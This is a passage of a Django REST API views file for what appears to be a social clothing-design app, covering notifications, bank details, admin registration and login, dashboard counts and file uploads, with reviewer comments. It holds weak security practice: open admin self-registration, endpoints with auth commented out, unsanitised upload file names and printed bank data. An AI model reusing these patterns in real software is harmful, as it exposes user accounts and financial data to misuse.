# Notification List
#====================================================
@api_view(['GET'])
@AppVersion_required
def GetNotificationList(request):
    """Return the caller's notifications, newest first, and mark them read.

    Each serialized notification is enriched with sender/receiver names and
    images, a related post image when the tag warrants it, and whether the
    caller follows the sender. Returns 200 with the list (or an empty list),
    401 on auth failure.
    """
    try:
        with transaction.atomic():
            # Token-based auth: raw token arrives in the Authorization header.
            API_key = request.META.get('HTTP_AUTHORIZATION')
            if API_key is not None:
                try:
                    token1 = Token.objects.get(key=API_key)
                    user = token1.user
                    checkGroup = user.groups.filter(name='User').exists()
                except:
                    return Response({"message": "Session expired!! please login again", "status": "0"},status=status.HTTP_401_UNAUTHORIZED)
                # page_num = request.GET['page_num']
                if checkGroup:
                    notificationObjs = Notification.objects.filter(receiver_id=user.id).order_by('-notification_time')
                    # paginator = Paginator(notificationObjs, 4)
                    # try:
                    # notificationObjs = paginator.page(page_num)
                    # except:
                    # notificationObjs = None
                    if notificationObjs:
                        serializedData = NotificationSerializer(notificationObjs,many=True).data
                        for data in serializedData:
                            # Enrich each notification with sender/receiver details.
                            obj1 = User.objects.get(id = data['sender'])
                            obj2 = User.objects.get(id = data['receiver'])
                            obj3 = FollowUser.objects.filter(follow_by_id = user.id, follow_to_id =data['sender'])
                            data['sender_name'] = obj1.fullname
                            data['sender_image'] = obj1.image
                            data['receiver_image'] = obj2.image
                            if data['tag'] == "like" or data['tag'] == "order place":
                                # table_id refers to a Post; the loop leaves the
                                # LAST image — presumably intended, confirm.
                                obj5 = PostImage.objects.filter(post_id = data['table_id'])
                                for i in obj5:
                                    data['post_image'] = i.post_images
                            elif data['tag'] == "Order Accept":
                                # table_id refers to an OrderPost; resolve its post's image.
                                obj7 = OrderPost.objects.get(id = data['table_id'])
                                jj = obj7.post_id
                                obj8 = PostImage.objects.filter(post_id = jj)
                                for k in obj8:
                                    data['post_image'] = k.post_images
                            else:
                                data['post_image'] = None
                            if obj3:
                                data["follow_status"] = True
                            else:
                                data["follow_status"] = False
                        # Mark everything as read once the payload has been built.
                        objs = Notification.objects.filter(receiver_id=user.id).update(is_read=1)
                        return Response({'message': 'success', 'data': serializedData},status=status.HTTP_200_OK)
                    else:
                        return Response({"data": []}, status=status.HTTP_200_OK)
                else:
                    return Response({"message": errorMessage, "status": "0"}, status=status.HTTP_401_UNAUTHORIZED)
            else:
                return Response({"message": errorMessage, "status": "0"}, status=status.HTTP_401_UNAUTHORIZED)
    except Exception as e:
        print(traceback.format_exc())
        return Response({"message": errorMessage, "status": "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#================================================
# delete notification
#================================================
@AppVersion_required
@api_view(['GET'])
def DeleteNotification(request):
    """Delete every notification addressed to the authenticated user.

    Returns 200 with a success message (or a "nothing to delete" notice),
    401 when the token is missing/invalid or the caller is not in the
    'User' group.
    """
    try:
        with transaction.atomic():
            API_key = request.META.get('HTTP_AUTHORIZATION')
            # BUG FIX: the original had only one `else:` for two `if`s, so one
            # unauthorized path fell through and returned None (a server
            # error); every path now returns an explicit response.
            if API_key is None:
                return Response({"message": errorMessage, "status": "0"}, status=status.HTTP_401_UNAUTHORIZED)
            try:
                token1 = Token.objects.get(key=API_key)
                user = token1.user
                checkGroup = user.groups.filter(name='User').exists()
            except:
                return Response({"message": "Session expired!! please login again", "status": "0"},status=status.HTTP_401_UNAUTHORIZED)
            if not checkGroup:
                return Response({"message": errorMessage, "status": "0"}, status=status.HTTP_401_UNAUTHORIZED)
            if Notification.objects.filter(receiver_id = user.id).exists():
                Notification.objects.filter(receiver_id=user.id).delete()
                return Response({"message": deleteSuccessMessage},status=status.HTTP_200_OK)
            return Response({"message" : "you don't have any notification"}, status=status.HTTP_200_OK)
    except Exception as e:
        print(traceback.format_exc())
        return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
def priceindecimal(postjson):
    """Convert each item's 'price' field to Decimal, in place.

    Args:
        postjson: a serializer (or any object) whose ``.data`` attribute is
            an iterable of dict-like items carrying a 'price' key.

    Errors are reported to stdout and swallowed so a single bad record does
    not abort the caller's response.
    """
    try:
        # The index from the original enumerate() was never used.
        for data in postjson.data:
            data['price'] = Decimal(data['price'])
    except Exception:
        # Best-effort conversion: log and continue (message typo fixed).
        print("Something Went Wrong")
###############################################################################################
# Custom design
##############################################################################################
@AppVersion_required
@api_view(['GET'])
def getCustomList(request):
    """Return all building blocks for the custom-design screen in one payload.

    Bundles cloth styles, shapes, shape border/fill colours and sizes;
    price fields are converted to Decimal in place via priceindecimal().
    Returns 200 with the data, 401 on auth failure.
    """
    try:
        with transaction.atomic():
            # received_json_data = json.loads(request.body.decode('utf-8'), strict=False)
            try:
                API_key = request.META.get('HTTP_AUTHORIZATION')
                token1 = Token.objects.get(key=API_key)
                user = token1.user
                checkGroup = user.groups.filter(name='User').exists()
                if checkGroup == False:
                    return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
            except:
                return Response({"message": errorMessageUnauthorised, "status": "0"},status=status.HTTP_401_UNAUTHORIZED)
            clothstyle = ClothStyle.objects.all()
            clothstyleserializer = ClothStyleSerializer(clothstyle,many=True)
            priceindecimal(clothstyleserializer)
            obj = clothstyleserializer.data
            shape = Shape.objects.all()
            shapeserializer = ShapeSerializer(shape,many=True)
            priceindecimal(shapeserializer)
            shapecolour = ShapeColour.objects.all()
            shapecolourserializer = ShapeColourSerializer(shapecolour,many=True)
            # An empty dict is prepended to the fill-colour list — presumably a
            # "no fill" placeholder for the client UI; confirm with the app team.
            b = {}
            shapefillcolour = ShapeFillColour.objects.all()
            shapeFillcolourserializer = ShapeFillColourSerializer(shapefillcolour,many=True)
            shapeemptylist = shapeFillcolourserializer.data
            shapeemptylist.insert(0,b)
            size = CustSize.objects.all()
            sizeserializer = CustSizeSerializer(size,many=True)
            priceindecimal(sizeserializer)
            return Response({"message" : "Response Send Succesfully","status" : "1","clothstyle":obj ,"shape":shapeserializer.data,"shape_border_colour":shapecolourserializer.data,"shape_fill_colour":shapeemptylist,"size":sizeserializer.data}, status=status.HTTP_200_OK)
    except Exception:
        print(traceback.format_exc())
        return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#################################################################
# Add bank account
##################################################################
@api_view(['POST'])
def AddBank(request):
    """Create or update the caller's bank details (stored encrypted).

    All four fields are encrypted with ``cipher_suite`` before being written.
    ``user.has_bank_account`` selects insert vs. update. Returns 200 with the
    serialized bank detail, 401 on auth/other failure.
    """
    try:
        with transaction.atomic():
            API_key = request.META.get('HTTP_AUTHORIZATION')
            if API_key is not None:
                try:
                    token1 = Token.objects.get(key=API_key)
                    user = token1.user
                except:
                    return Response({"message" : "Session expired!! please login again", "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
                checkGroup = user.groups.filter(name='User').exists()
                if checkGroup:
                    stripe.api_key = settings.STRIPE_SECRET_KEY
                    # Encrypt each field: encode to bytes, encrypt, store as text.
                    account_holder_name = bytes(request.data['account_holder_name'],'utf-8')
                    account_holder_name = cipher_suite.encrypt(account_holder_name)
                    account_holder_name = account_holder_name.decode("utf-8")
                    account_holder_type = bytes(request.data['account_holder_type'],'utf-8')
                    account_holder_type = cipher_suite.encrypt(account_holder_type)
                    account_holder_type = account_holder_type.decode("utf-8")
                    routing_number = bytes(request.data["routing_number"],'utf-8')
                    routing_number = cipher_suite.encrypt(routing_number)
                    routing_number = routing_number.decode("utf-8")
                    account_number = bytes(request.data["account_number"],'utf-8')
                    account_number = cipher_suite.encrypt(account_number)
                    account_number = account_number.decode("utf-8")
                    if user.has_bank_account == 0:
                        # First-time entry: insert and flip the user's flag.
                        bankacc = BankDetail.objects.create(Account_name = account_holder_name,
                                                            Type = account_holder_type,
                                                            routing_number = routing_number,
                                                            acc_number = account_number,
                                                            user_id = user.id)
                        if bankacc is not None:
                            User.objects.filter(id=user.id).update(has_bank_account=1)
                            return Response({"message" : "Bank added successfully", "status" : "1", "bank_detail": BankDetailSerializer(bankacc).data}, status=status.HTTP_200_OK)
                    else:
                        # Existing record: overwrite in place.
                        bankacc = BankDetail.objects.filter(user_id=user.id).update(Account_name = account_holder_name,
                                                            Type = account_holder_type,
                                                            routing_number = routing_number,
                                                            acc_number = account_number,
                                                            user_id = user.id)
                        if bankacc is not None:
                            detail = BankDetail.objects.get(user_id=user.id)
                            serl = BankDetailSerializer(detail).data
                            print(serl,"hgjh")  # NOTE(review): leftover debug print of bank data — consider removing.
                            return Response({"message" : "Bank detail updated sucessfully", "status" : "1","bank_detail":serl}, status=status.HTTP_200_OK)
                        else:
                            return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
                else:
                    return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
            # NOTE(review): no response when API_key is None — the view returns
            # None (server error) in that case; confirm and add an explicit 401.
    except Exception as e:
        print(traceback.format_exc())
        return Response({"message": errorMessage, "status": "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#======================================================
# Admin API's
#======================================================
#========================================
# api for SignUp user
#========================================
# @AppVersion_required
@csrf_exempt
@api_view(['POST'])
def SignUpAdmin(request):
    """Register a new Admin user.

    Expects a JSON body with email, phone, password, deviceId and
    deviceType. Returns 409 when the email is already registered, 201 with
    an auth token on success.
    """
    try:
        with transaction.atomic():
            received_json_data = json.loads(request.body.decode('utf-8'), strict=False)
            # BUG FIX: the original wrapped the lookup in a bare except, so ANY
            # error (bad payload, DB failure) was treated as "user not found"
            # and fell through to create. An explicit existence check lets
            # real errors reach the 500 handler below instead.
            if User.objects.filter(email = received_json_data['email']).exists():
                return Response({"message" : errorEmailExist, "status" : "0"}, status=status.HTTP_409_CONFLICT)
            authuser = User.objects.create(email = received_json_data['email'],
                                            phone = received_json_data['phone'],
                                            username = received_json_data['email'],
                                            password = make_password(received_json_data['password']),
                                            deviceId = received_json_data['deviceId'],
                                            deviceType = received_json_data['deviceType'])
            g = Group.objects.get(name='Admin')
            g.user_set.add(authuser)
            token = Token.objects.create(user=authuser)
            return Response({"message" : addSuccessMessage,"token":token.key ,"status" : "1"}, status=status.HTTP_201_CREATED)
    except Exception:
        print(traceback.format_exc())
        return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#===========================================
# adding promo post by admin
#===========================================
@api_view(['POST'])
def addadminPost(request):
    """Create a promotional post on behalf of an Admin user.

    Multipart request: ``data`` is a JSON string holding ``post_description``;
    ``post_image`` is the uploaded file, saved under ``postimages/<post_id>/``.
    Returns 200 on success, 401 on auth failure, 500 otherwise.
    """
    try:
        with transaction.atomic():
            received_json_data = json.loads(request.data['data'], strict=False)
            try:
                API_key = request.META.get('HTTP_AUTHORIZATION')
                token1 = Token.objects.get(key=API_key)
                user = token1.user
                checkGroup = user.groups.filter(name='Admin').exists()
                if checkGroup == False:
                    return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
            except:
                return Response({"message": errorMessageUnauthorised, "status": "0"},status=status.HTTP_401_UNAUTHORIZED)
            user1 = User.objects.get(id = user.id)
            nowTime = datetime.datetime.utcnow().replace(tzinfo=utc)
            post = Post.objects.create(
                                post_description = received_json_data['post_description'],
                                user_id = user1.id,
                                created_time = nowTime,
                                post_status = 1)
            if post is not None:
                # Keep the author's denormalised post counter in sync.
                post_count = user1.post_count
                User.objects.filter(id = user.id).update(post_count = post_count+1)
                # assumes 'post_image' is always present — a missing file would
                # raise on file.name and the atomic block would roll back; TODO confirm.
                file = request.FILES.get('post_image')
                fs = FileSystemStorage()
                filename = fs.save("postimages/"+str(post.id)+"/"+file.name, file)
                uploaded_file_url = fs.url(filename)
                PostImage.objects.create(post_images = uploaded_file_url,post_id = post.id)
                return Response({"message" : addPostSuccessMessage, "status" : "1"}, status=status.HTTP_200_OK)
            else:
                return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
    except Exception:
        print(traceback.format_exc())
        return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#=========================================
# Registered Users
#=========================================
@api_view(['POST'])
def RegisteredUsers(request):
    """Return the full list of registered users (Admin only).

    NOTE(review): another view named ``RegisteredUsers`` is defined later in
    this module and shadows this one at import time — confirm which of the
    two the URLconf should reference.
    """
    try:
        with transaction.atomic():
            try:
                API_key = request.META.get('HTTP_AUTHORIZATION')
                token1 = Token.objects.get(key=API_key)
                user = token1.user
                checkGroup = user.groups.filter(name='Admin').exists()
                if checkGroup == False:
                    return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
            except:
                return Response({"message": errorMessageUnauthorised, "status": "0"},status=status.HTTP_401_UNAUTHORIZED)
            registered = User.objects.all()
            if registered:
                registered_serializer = UserSerializer(registered, many=True)
                data = registered_serializer.data
                return Response({"message" : "list of users","data":data}, status=status.HTTP_201_CREATED)
            # BUG FIX: the original fell through and returned None (a server
            # error) when the table was empty; respond with an empty list.
            return Response({"message" : "list of users","data": []}, status=status.HTTP_201_CREATED)
    except Exception:
        print(traceback.format_exc())
        return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#=========================================
# Total Users
#=========================================
@api_view(['GET'])
def RegisteredUsers(request):
    """Return the total count of registered users.

    NOTE(review): this redefinition shadows the earlier ``RegisteredUsers``
    view (the POST one returning the full user list) — only this one is live
    at import time; confirm which one the URLconf expects.
    NOTE(review): the auth check below is commented out, so this endpoint is
    currently unauthenticated.
    """
    # try:
    #     with transaction.atomic():
    #         try:
    #             API_key = request.META.get('HTTP_AUTHORIZATION')
    #             token1 = Token.objects.get(key=API_key)
    #             user = token1.user
    #             checkGroup = user.groups.filter(name='Admin').exists()
    #             if checkGroup == False:
    #                 return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
    #         except:
    #             return Response({"message": errorMessageUnauthorised, "status": "0"},status=status.HTTP_401_UNAUTHORIZED)
    registered = User.objects.all().count()
    # if registered:
    #     registered_serializer = UserSerializer(registered, many=True)
    #     data = registered_serializer.data
    return Response({"message" : "list of users","data":registered}, status=status.HTTP_201_CREATED)
    # except Exception:
    #     print(traceback.format_exc())
    #     return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#=====================================
#Active Users
#=====================================
@api_view(['GET'])
def ActiveUsers(request):
    """Return the count of users active within the last 10 minutes.

    NOTE(review): the auth check below is commented out, so this endpoint is
    currently unauthenticated.
    """
    # try:
    #     with transaction.atomic():
    #         try:
    #             API_key = request.META.get('HTTP_AUTHORIZATION')
    #             token1 = Token.objects.get(key=API_key)
    #             user = token1.user
    #             checkGroup = user.groups.filter(name='Admin').exists()
    #             if checkGroup == False:
    #                 return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
    #         except:
    #             return Response({"message": errorMessageUnauthorised, "status": "0"},status=status.HTTP_401_UNAUTHORIZED)
    # "Active" = lastUpdated within the last 10 minutes. Uses naive local time —
    # assumes lastUpdated is stored in the same timezone; TODO confirm.
    nowTime = datetime.datetime.now()
    now_minus_10 = nowTime - datetime.timedelta(minutes = 10)
    # count = User.objects.filter(lastUpdated__startswith=timezone.now().date()).count()
    # count = User.objects.filter(lastUpdated__startswith=now_minus_10).count()
    count = User.objects.filter(lastUpdated__gte=now_minus_10).count()
    return Response({"message" : "list of users","data":count}, status=status.HTTP_201_CREATED)
    # except Exception:
    #     print(traceback.format_exc())
    #     return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#==========================================
#Total Orders
#==========================================
@api_view(['GET'])
def TotalOrders(request):
    """Return the total number of order transactions."""
    order_count = OrderTrn.objects.count()
    return Response({"message" : "total orders","data":order_count}, status=status.HTTP_201_CREATED)
#===========================================
# promo post
#===========================================
#===========================================
# payment
#===========================================
# filter payment by username and date
#===========================================
# notifications
#===========================================
# help support
# like and comments on post
# report post
# list posts
import pdb
#########################################################################################################################
#########################################################################################################################
#****************************************************Admin Apis**********************************************************
#########################################################################################################################
#########################################################################################################################
############################################################
# Admin login
############################################################
############################################################
# Admin Register
############################################################
@csrf_exempt
@api_view(['POST'])
def AdminRegister(request):
    """Register an Admin account keyed to a device id.

    Expects ``device_id``, ``email`` and ``password`` (plus optional
    ``deviceType``). When email is absent or "null", a synthetic
    ``<device_id>@Distaff.com`` address is used. Returns 200 for both the
    already-registered and newly-created cases.
    """
    try:
        with transaction.atomic():
            deviceId = request.data['device_id']
            email = request.data['email']
            if request.POST.get('deviceType') is not None:
                deviceType = request.data['deviceType']
            else:
                deviceType = "a"
            if email is None or email == "Null" or email == "null":
                email = deviceId+"@Distaff.com"
            username = email
            nowTime = datetime.datetime.now()
            # BUG FIX: the duplicate check queried the non-existent field name
            # ``device_id`` (the model field is ``deviceId`` — see the create()
            # below); the bare except swallowed the resulting error, so the
            # check never matched and every call created a new user.
            # filter().first() also avoids MultipleObjectsReturned on the
            # duplicates the old bug produced.
            existedUser = User.objects.filter(deviceId=deviceId).first()
            if existedUser is not None:
                return Response({"status" : "1", 'message':'User Already Registered'}, status=status.HTTP_200_OK)
            else:
                authUser = User.objects.create(username=email,
                                            email=email,
                                            first_name='firstname',
                                            last_name='',
                                            password=make_password(request.data['password']),
                                            deviceType=deviceType,
                                            deviceId=deviceId,
                                            date_joined= nowTime,
                                            is_superuser=0,
                                            is_staff=0,
                                            is_active=1,
                                            role=2 )
                serialized_data = UserSerializer(authUser)
                g = Group.objects.get(name='Admin')
                g.user_set.add(authUser)
                token = Token.objects.create(user=authUser)
                userDetail = {'token':token.key, 'user': serialized_data.data}
                return Response({"status" : "1", 'message':'User has been successfully registered.', 'user' : userDetail}, status=status.HTTP_200_OK)
    except Exception as e:
        print(traceback.format_exc())
        return Response({'status':0, 'message':"Something Wrong."}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#############################################################
# Admin Login
############################################################
@csrf_exempt
@api_view(['POST'])
def AdminLogin(request):
    """Authenticate an admin by email/password and issue a fresh auth token.

    Any pre-existing token for the user is deleted and replaced, so logging
    in invalidates earlier sessions. ``is_email_error`` tells the client
    whether the email lookup itself failed.
    """
    try:
        with transaction.atomic():
            deviceId = request.data['device_id']
            email = request.data['email']
            password = request.data['password']
            if request.POST.get('deviceType') is not None:
                deviceType = request.data['deviceType']
            else:
                deviceType = "a"
            # Same synthetic-email fallback as AdminRegister.
            if email is None or email == "Null" or email == "null":
                email = deviceId+"@Distaff.com"
            username = email
            nowTime = datetime.datetime.now()
            is_email_error = False
            try:
                existedUser = User.objects.get(email =email)
            except:
                existedUser = None
                is_email_error = True
            if existedUser is not None:
                authUser = authenticate(username=email, password=password)
                if authUser is not None:
                    checkGroup = authUser.groups.filter(name='Admin').exists()
                    if checkGroup:
                        token = ''
                        try:
                            user_with_token = Token.objects.get(user=authUser)
                        except:
                            user_with_token = None
                        # Rotate the token: delete any existing one and mint a
                        # new key, invalidating earlier sessions.
                        if user_with_token is None:
                            token1 = Token.objects.create(user=authUser)
                            token = token1.key
                        else:
                            Token.objects.get(user=authUser).delete()
                            token1 = Token.objects.create(user=authUser)
                            token = token1.key
                        serialized_data = UserSerializer(existedUser)
                        userDetail = {'token':token, 'user': serialized_data.data }
                        # Track activity for the "active users" dashboards.
                        User.objects.filter(id=existedUser.id).update(lastUpdated = nowTime)
                        return Response({"status" : "1", 'message':'User Login Sucessfully', 'data':userDetail, 'is_email_error':is_email_error}, status=status.HTTP_200_OK)
                    # NOTE(review): an authenticated user outside the Admin
                    # group falls through with no response (the view returns
                    # None) — confirm and add an explicit 401/403.
                else:
                    return Response({"status" : "1", 'message':'Email Or Password is Wrong.','is_email_error':is_email_error}, status=status.HTTP_400_BAD_REQUEST)
            else:
                return Response({"status" : "1", 'message':'Please Register Your Account.','is_email_error':is_email_error}, status=status.HTTP_400_BAD_REQUEST)
    except Exception as e:
        print(traceback.format_exc())
        return Response({'status':0, 'message':"Something Wrong."}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
############################################################
# Get Admin profile
############################################################
@api_view(['GET'])
def Get_Admin_Profile(request):
    """Return the authenticated admin's own profile.

    The profile is serialized as a one-element list under "response".
    Returns 200 on success, 401 on any auth failure.
    """
    try:
        with transaction.atomic():
            API_key = request.META.get('HTTP_AUTHORIZATION')
            if API_key is not None:
                try:
                    token1 = Token.objects.get(key=API_key)
                    user = token1.user
                    checkGroup = user.groups.filter(name='Admin').exists()
                except:
                    return Response({"message": "Session expired!! please login again", "status": "0"},
                                    status=status.HTTP_401_UNAUTHORIZED)
                if checkGroup:
                    profile_qs = User.objects.filter(id=user.id)
                    # BUG FIX: a QuerySet is never None, so the previous
                    # ``is not None`` check could never fail; test emptiness
                    # explicitly instead.
                    if profile_qs.exists():
                        user_serializer = UserSerializer(profile_qs, many = True)
                        return Response({"message" : addSuccessMessage, "response" : user_serializer.data, "status" : "1"}, status=status.HTTP_200_OK)
                    else:
                        return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
                else:
                    return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
            else:
                return Response({"message": errorMessage, "status": "0"}, status=status.HTTP_401_UNAUTHORIZED)
    except Exception as e:
        print(traceback.format_exc())
        return Response({"message": errorMessage, "status": "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
###############################################################
# Edit Admin Profile
###############################################################
@api_view(['POST'])
def EditProfile(request):
    """Update the authenticated admin's name and email (username mirrors email).

    NOTE(review): request.data.get() returns None for missing keys, which
    would null out the corresponding field — confirm the client always sends
    first_name, last_name and email.
    """
    try:
        with transaction.atomic():
            try:
                api_key = request.META.get('HTTP_AUTHORIZATION')
                token1 = Token.objects.get(key=api_key)
                user = token1.user
                check_group = user.groups.filter(name='Admin').exists()
                if check_group == False:
                    return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
            except:
                print(traceback.format_exc())
                return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
            user.first_name = request.data.get('first_name')
            user.last_name = request.data.get('last_name')
            user.email = request.data.get('email')
            # username is kept in lockstep with email (it is used as the login name).
            user.username = request.data.get('email')
            user.save(update_fields=['first_name', 'last_name', 'email', 'username'])
            return Response({"Message": "User Updated Successfully.", "user": user.id,"status" : "1"}, status=status.HTTP_200_OK)
    except Exception:
        print(traceback.format_exc())
        return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
############################################################
# Get Dashboard Data
############################################################
@api_view(['GET'])
def Dashboard(request):
    """Aggregate counts for the admin dashboard.

    Returns the number of registered end users, those active in the last
    10 minutes, and the total order transactions.
    """
    try:
        with transaction.atomic():
            try:
                api_key = request.META.get('HTTP_AUTHORIZATION')
                admin_user = Token.objects.get(key=api_key).user
                if not admin_user.groups.filter(name='Admin').exists():
                    return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
            except:
                print(traceback.format_exc())
                return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
            # "Active" = lastUpdated within the last 10 minutes.
            cutoff = datetime.datetime.now() - datetime.timedelta(minutes = 10)
            total_users = User.objects.filter(is_staff=0,role=0).count()
            active_count = User.objects.filter(lastUpdated__gte=cutoff,is_staff=0,role=0).count()
            order_total = OrderTrn.objects.all().count()
            return Response({"total_users" : total_users, "total_active_users" : active_count,"total_order": order_total,"status" : "1"}, status=status.HTTP_200_OK)
    except Exception:
        print(traceback.format_exc())
        return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
########################################################################################
# logout Admin User
########################################################################################
@api_view(['POST'])
def LogutAdminUser(request):
    """Log out an admin by deleting the auth token from the Authorization header."""
    try:
        with transaction.atomic():
            auth_key = request.META.get('HTTP_AUTHORIZATION')
            if auth_key is None:
                return Response({"message": errorMessage, "status":"0"},status = status.HTTP_401_UNAUTHORIZED)
            try:
                session_user = Token.objects.get(key=auth_key).user
            except:
                session_user = None
            if session_user is None:
                return Response({"message" : errorMessage,"status":"0"},status = status.HTTP_401_UNAUTHORIZED)
            # Deleting the token invalidates this session everywhere.
            session_user.auth_token.delete()
            return Response({"message": "Logged Out Successfully","status":"1"}, status=status.HTTP_200_OK)
    except Exception:
        print(traceback.format_exc())
        return Response({"message": errorMessage,"status":"0"},status=status.HTTP_500_INTERNAL_SERVER_ERROR)
##################################################################################################################
# Change Admin Password
##################################################################################################################
@api_view(['POST'])
def Change_Admin_Password(request):
    """Change the logged-in admin's password.

    Validates the current password, rejects reuse of the old password and
    mismatched confirmations, then persists the new hash.
    SECURITY FIX: the previous version print()ed every password in plain
    text to stdout/logs; all debug output has been removed.
    """
    try:
        with transaction.atomic():
            API_Key = request.META.get('HTTP_AUTHORIZATION')
            if API_Key is not None:
                try:
                    token1 = Token.objects.get(key=API_Key)
                    user = token1.user
                    checkGroup = user.groups.filter(name='Admin').exists()
                except:
                    return Response({"message": "Session expired! please login again", "status":"0"},status=status.HTTP_401_UNAUTHORIZED)
                if checkGroup:
                    currentPassword = request.data['currentPassword']
                    newPassword = request.data['newPassword']
                    confirmPassword = request.data['confirmPassword']
                    success = user.check_password(str(currentPassword))
                    if success:
                        if currentPassword == newPassword:
                            return Response({"message": "Please Enter a Different new Password", "status":"0"},status=status.HTTP_406_NOT_ACCEPTABLE)
                        if newPassword == confirmPassword:
                            # Dead code removed: a set_password() on a fetched
                            # user was never save()d; this queryset update is
                            # what actually persists the new hash.
                            result = User.objects.filter(id=user.id).update(password = make_password(newPassword))
                            if result:
                                return Response({"status":"1","message": "Password Changed Successfully"},status=status.HTTP_200_OK)
                            return Response({"message": errorMessage,"status":"0"},status=status.HTTP_500_INTERNAL_SERVER_ERROR)
                        return Response({"message": "newPassword and ConfirmPassword not Matched","status":"0"},status=status.HTTP_406_NOT_ACCEPTABLE)
                    return Response({"message": "current password incorrect","status":"0"},status=status.HTTP_406_NOT_ACCEPTABLE)
                # BUG FIX: non-admin callers previously fell through without a
                # response (the view returned None); reject them explicitly.
                return Response({"message": errorMessage,"status":"0"},status=status.HTTP_401_UNAUTHORIZED)
            else:
                return Response({"message": "Session expired! please login again", "status":"0"},status=status.HTTP_401_UNAUTHORIZED)
    except Exception:
        print(traceback.format_exc())
        return Response({"message": errorMessage,"status":"0"},status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#############################################################################################
# upload file
#############################################################################################
@api_view(['POST'])
def uploadfile(request):
    """Attach an uploaded file to a post or a user profile (Admin only).

    ``type`` selects the target: "post" saves under postimages/<id>/ and
    creates a PostImage row; "userprofile" saves under userimage/<id>/ and
    updates the user's image. For type "notifications", ``id`` may be a
    comma-separated list — it is parsed but not otherwise handled here;
    NOTE(review): confirm where notification uploads are processed.
    """
    try:
        with transaction.atomic():
            try:
                print(request.data.get('id'),"iiii")
                api_key = request.META.get('HTTP_AUTHORIZATION')
                token1 = Token.objects.get(key=api_key)
                user = token1.user
                check_group = user.groups.filter(name='Admin').exists()
                if check_group == False:
                    return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
            except:
                print(traceback.format_exc())
                return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
            try:
                if request.data.get('type') == "notifications":
                    # Multiple targets: id arrives as "1,2,3".
                    is_array = isinstance(request.data.get('id').split(','), list)
                    print(is_array,"array")
                    request_id = request.data.get('id').split(',')
                    print(request_id,"idddddd")
                else:
                    request_id = int(request.data.get('id'))
            except:
                # Missing or non-numeric id — treated as absent below.
                request_id = None
            print(request_id)
            if request_id is not None:
                if request.data.get('type') == "post":
                    file = request.FILES.get('file')
                    fs = FileSystemStorage()
                    filename = fs.save("postimages/"+str(request_id)+"/"+file.name, file)
                    uploaded_file_url = fs.url(filename)
                    PostImage.objects.create(post_images = uploaded_file_url,post_id =request_id)
                if request.data.get('type') == "userprofile":
                    file = request.FILES.get('file')
                    fs = FileSystemStorage()
                    filename = fs.save("userimage/"+str(request_id)+"/"+file.name, file)
                    uploaded_file_url = fs.url(filename)
                    User.objects.filter(id = request_id).update(image = uploaded_file_url)
                return Response({"message" : "Response Send Succesfully","status" : "1"}, status=status.HTTP_200_OK)
            else:
                return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
    except Exception:
        print(traceback.format_exc())
        return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
####################################################################################
# list of active users
####################################################################################
@api_view(['GET'])
def Active_Users(request):
    """List non-staff users active within the last 10 minutes (Admin only).

    user_name and email are truncated to 30 characters for display.
    """
    try:
        with transaction.atomic():
            try:
                API_key = request.META.get('HTTP_AUTHORIZATION')
                token1 = Token.objects.get(key=API_key)
                user = token1.user
                checkGroup = user.groups.filter(name='Admin').exists()
                if checkGroup == False:
                    return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
            except:
                return Response({"message": errorMessageUnauthorised, "status": "0"},status=status.HTTP_401_UNAUTHORIZED)
            # "Active" = lastUpdated within the last 10 minutes.
            now_minus_10 = datetime.datetime.now() - datetime.timedelta(minutes = 10)
            activity = User.objects.filter(lastUpdated__gte=now_minus_10,is_staff=0,role=0)
